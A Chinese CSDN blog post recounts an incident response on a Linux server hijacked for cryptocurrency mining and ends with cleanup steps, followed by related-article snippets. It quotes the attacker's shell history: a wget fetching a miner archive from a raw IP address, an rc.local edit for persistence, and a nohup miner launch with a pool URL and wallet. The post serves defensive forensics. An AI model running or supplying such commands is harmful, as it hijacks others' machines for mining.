服务器被入侵当做挖矿肉鸡

最新推荐文章于 2024-10-11 23:43:08 发布
最新推荐文章于 2024-10-11 23:43:08 发布
阅读量5.9k 收藏 5
点赞数 2
分类专栏: 故障处理 文章标签: 服务器 挖矿肉鸡 CPU使用率高 服务器被入侵
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mfanoffice2012/article/details/78899552
版权

早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%!
1.立即登录该服务器查看CPU top10

ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head

发现 有一个yam开头的进程CPU已经占用120%,(此处无截图)
经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。

2.find找一下本地有没有yam相关的目录

find / -name yam

已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。
这里写图片描述
3.查看下登录日志

last

这里写图片描述

这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:

history

贴出关键部分

884  wget http://210.245.92.160:9090/miner.tgz
  
885  vi /etc/rc.d/rc.local
  
886  tar zxvf miner.tgz
  
887  cd yam-yvg1900-M7v-linux64-generic
  
888  cd linux64-generic
  
889  nohup ./yam -c 1 -M stratum+tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:x@erebor.dwarfpool.com:8005:8050:8080:8100/xmr

很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。

4.看一下他get的这个网站

这里写图片描述

好吧,自己做的一个页面方便别人下载矿机用的。
在里面的文件发现软件的作者
这里写图片描述

5.清理工作
kill 掉进程
删除root家目录的包
删除/etc/rc.d/rc.local中的开机启动项
更改root密码

先做这么多,大家还有什么好的建议请多指教。

范一刀
关注
专栏目录
如何防范成为肉鸡
悦分享
06-12 1017
一、“肉鸡”是什么?在计算机领域中,“肉鸡”是指被黑客成功入侵并受远程操纵的主机,也称为“傀儡机”。举例说明,黑客可以将其C盘映射成自己的G盘,或控制其鼠标、摄像头等。“肉鸡”本身其实危险并非很大,可怕的是控制大量肉鸡,将其当作跳板,进行DDOS攻击;更有别有用心的人利用控制的肉鸡进行“挖矿”。二、”肉鸡”可能会带来什么危害? “肉鸡”听起来很遥远,实际上与我们每一个人息息相关。比如,在玩网游时,被“盗号”就是最常见的一种体现。不止整个账号被盗,潜在的风险还有QQ号里的Q币等各种虚拟财产的损失。除了虚拟财产
一次 minerd 肉鸡木马的排查思路
weixin_43770745的博客
08-29 1016
备注:根据 ps 查询结果显示 minerd 有向域名 xmr.crypto-pool.fr 进行数据通信,通过 ping 测试域名解析核实此域名对应的 IP 地址,然后在 ip.taobao.com 进行查询显示 IP 为法国的 IP,然后通过 iftop -i eth1 -PB 命令对流量进行了监控,确实存在向法国的 IP 发送数据的情况,为了避免再次被入侵,可以通过 iptables 屏蔽对应的异常 IP(具体的 IP 和域名要根据实际查询的情况而定,可能会有所不同)。...
服务器肉鸡/入侵被恶意利用的排查和优化方案
yunhan0609的博客
07-05 1227
排查方法: 1.账户方面: Windows: (1) 检查服务器内是否有异常的账户,查看下服务器内是否有非系统和用户本身创建的账户,一般黑客创建的账户账户名 后会有$这个字符,有此类账户存在,请立即禁用或者删除掉; (2) 黑客也可能在您服务器内创建隐藏用户,隐藏账户在本地用户内是查看不到的,您可以在服务器内点击开始-运行-输入 regedt32.exe,依次选择HKEY_LOCAL_MACHIN...
linux服务器被当肉鸡过程
Ryze的博客
06-17 9940
肉鸡,暴力破解入侵
服务器挖矿了怎么办?别急看这里@~…~@
童龙辉的博客
10-08 1345
服务器挖矿攻击通常是由于系统或应用程序的漏洞被黑客利用,导致恶意软件在服务器上运行,消耗大量资源进行加密货币挖矿。列举:从图中可以看到,你的系统检测到了一次“挖矿”行为,并标记为危威胁。攻击者的IP是,并且目标是。根据描述,攻击类型是通过客户端登录矿池进行的,矿池登录是挖矿行为的一种典型表现。下面将给出一般的处理方法希望能帮到大家。
服务器被抓“肉鸡”后怎么办?怎么避免被抓“肉鸡
weixin_45869730的博客
03-04 2973
服务器被抓“肉鸡”是指,当用户被诱导点击导致服务器泄露IP、用户名、密码后,或者电脑被黑客攻破植入木马,就会成为黑客手中的“肉鸡”,为所欲为,甚至明码标价,成为对外发动流量攻击的工具。   任何系统的电脑都有抓“肉鸡”的可能,当服务器入侵,成为“肉鸡”,windows,linux,unix等系统的服务器都有可能成为肉鸡。那么香港服务器被抓肉鸡了要怎么办呢?这里数据湾服务器来分享几个方法。   一、立即更改服务器信息和相关权限   1、更改系统管理员账户的密码,密码长度不小于8位并且使用大写.
记录一次服务器被攻击的事件,被当作了肉鸡
weixin_62220704的博客
06-14 1196
事件的起因是这样的,我们公司内网有台机器,ip为192.168.13.240,这台机器不用做生产,只是为了方便测试。过年之后到公司,突然这台机器就开不了机了,网上各种翻阅资料,最后能开机了,但数据盘格式化了。我也没太在意。我偶尔会登录,发现机器特别卡,没怎么注意,中间重启过几次,也是一样的。今天我又要用到机器测试些服务,卡的我特别烦躁,下定决心要找到原因。一排查发现自己已经是肉鸡了。
自建博客(day8之新买的服务器肉鸡,我该怎么处理)
计忆芳华的博客
05-18 385
前几天偶然发现可以用IDEA直接远程访问docker,非常兴,终于不用再用复杂的命令行去操作docker镜像和容器了,然而,随之而来的就是阿里的邮件,你的端口存在风险,你的服务器正在访问未知源下载源,你的服务器检测到对外攻击。 作为一个初入服务器的新手,我显然感觉,忽视这些邮件,都是垃圾邮件,吓唬我呢。。 救我买的那小破服务器,还能被黑客盯上。然后,我发现不对劲了,我的docker容器莫名的下载了ubuntu,一开始我还在想,是不是我IDEA连接docker后,会自动下载一个操作系统呢,然后我就把这.
入侵sf服务器技术_腾讯反入侵团队详解混沌工程的实践
weixin_39645308的博客
12-14 656
​​作者系腾讯反入侵团队jaylam。本文围绕洋葱系统的实时质量建设和优化,介绍混沌工程在其中的初步实践应用。在繁杂的业务和网络环境下,在公司百万级服务器面前,要做到入侵发生时的及时检测,那么反入侵系统的有效性,即系统质量,是至关重要的。洋葱系统是腾讯公司级的主机反入侵安全检测系统,它是实现了前端主机agent及后端分布式数据接入分析系统的一整套服务,覆盖的系统模块众多,部署的服务节点超百万,面临...
宝塔下如何应对检测到存在待处理的恶意文件提醒
最新发布
草根博客站长明月登楼的CSDN博客
10-11 619
就明月的经验大部分都是用了来路不明、破解版插件、主题带来的,毕竟这年月没人愿意免费破解,都是有目的的,那就是植入恶意代码和木马,只要你安装运行就会激活入侵系统了,至于带来的后果各种各样了。不会影响 WordPress 的正常运行,除非你所用的主题或者插件里有需要单独运行 PHP 代码的时候,比如:WordPress 小工具里增强文本(单独运行 PHP 代码)工具类的。】文章,然后就是停用所有插件,一个一个启用观察排除了或者修改 WordPress 的插件目录名称,重新安装正规渠道的插件。
渗透测试入门—— 常见术语概述
weixin_46694260的博客
12-26 9197
00x1 前言 刚入门小白,收集了一些渗透术语,废话不多说。 00x2 渗透术语 1.脚本 动态网站(如:asp,php,jsp), linux, python 2.网站 2.1静态网站:与后台交互比较少,如html) 2.2动态网站:使用动态脚本编写 如:asp,php,jsp,交互方便但是安全性不,如果代码过滤不严格可能会导致漏洞最终导致后台linux被别人随意操作 3.http协议 http(HyperText Transfer Protocol),超文本传输协议。是因特网上应用最为广泛的一种网络传
记一次服务器被当肉鸡挖矿的经历
独行侠梦的博客
03-06 4311
前言前一阵子,阿里云服务器促销,买了一台2G的主机来做测试学习用,搭好环境后基本就没怎么管它,最近发现CPU总是跑满,,于是按CPU消耗排序,排在第一的是一个名为“kdevtmpfsi”...
记一次苦逼的服务器挖矿的清除过程
热门推荐
bobpen的专栏
02-21 2万+
环境说明 Centos 6.2 现象描述       通过top查看服务器资源,cpu资源几乎被占尽,但是top list里面却没有显示出是哪个进程占用的资源 而且系统会提示以下信息 通过关键字查询miner & crytonight,得知服务器被而已挖矿了 解决办法 1.linux进入single模式 进入singl
Centos7下通过Zabbix自动发现并监控硬盘
bobpen的专栏
11-30 1万+
操作环境 Centos 7.2 zabbix 3.2 zabbix server :10.10.200.193 zabbix agent :10.10.200.227 操作步骤 之前已经讲过如何在centos7下搭建zabbix监控环境《Centos 7下搭建Zabbix监控软件》,可以参照该文件中步骤将10.10.200.227添加至zabbix se
挖矿肉鸡排查修复
奔跑吧笨笨的博客
08-13 1万+
昨晚,在可视化平台上,查看服务器监控情况,发现服务器CPU100%运行一天多了。因为是自己的测试服务器,拿来玩的,没有运行什么项目,所以,也没有经常看。发现100%,这是个问题啊,看来有事儿要做了! 排查步骤: 1. top 命令查看服务器运行情况 上图显示:qW3xT.2 进程CPU运行始终保持在98%以上,这个就是问题所在啊。kill 9392 杀死该进程...
黑客入侵阿里云主机挖矿以及利用redis漏洞扫描抓取肉鸡
u010064124的博客
03-17 1万+
本人前几天购买了阿里云主机,并安装了redis,第二天早上阿里云客服打电话过来询问我在ECS上做什么,为毛CPU使用率一直都是满的,我说我才买的啊,就装了俩软件,现在还在装呢,客服说我可能是装软件导致的这个问题,让我注意一下,如果长期CPU满负荷,可能给我宕机,资源数据不保。挂了电话后我就登上了阿里云账号,看了一下自己Mem和CPU的使用状况,Mem倒没撒,CPU...
记一次阿里云被肉鸡排查
小纯洁的博客
05-23 740
今天上午大概10点多,登录服务器查看相关项目,不料登录页面直接卡死,无法连接,好不容易登录进去发现,命令输入卡的不要不要的,一看CPU 卧槽!卧槽!卧槽! 我都没跑什么程序怎么会100%???(个人的非公司的,没有跑什么程序) 赶紧登录阿里云控制台发现, 卧槽?吓得我赶紧点进去看看这tm的日了狗了!!!!!!赶紧进入阿里云网页版控制台,也是漫长的煎熬,等了半天终于进去了 然而并没有什么卵用...
服务器肉鸡解决过程
wanghaichaonihao的专栏
07-27 4219
上个星期五同事说阿里云发短信说吉林一个IP登陆了我们公司的一个服务器,让我上去看看,然后在/var/log/secure日志中两行登录日志 Mar  9 20:35:30 localhost sshd[30379]: Accepted password for root from 221.203.142.131 port 56906 ssh2 Mar  9 20:35:30 localhost
服务器入侵后的检测过程
刘书的IT博客
02-15 2202
2012年5月22日17时许,发现公司一台非正式生产服务器(有公网IP)的root密码被修改,导致无法登陆服务器,排查处理过程如下: 1、通过vmware vcenter管理端进入单用户模式修改root密码  2、查看最近登陆信息,如下: [root@localhost home]# last  | more root     pts/5 218.247.13.60 Tue May 22 1
Telnet入侵策略:利用与安全防护解析
此外,入侵者还会利用 Telnet作为跳板,通过多个肉鸡(被控制的计算机)接力,隐藏自身IP,提隐蔽性,这部分将在后续章节详细阐述。 针对Telnet的安全问题,Microsoft为了增强防护,引入了NTLM验证,要求Telnet...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

范一刀

你的鼓励是我创作最大的动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值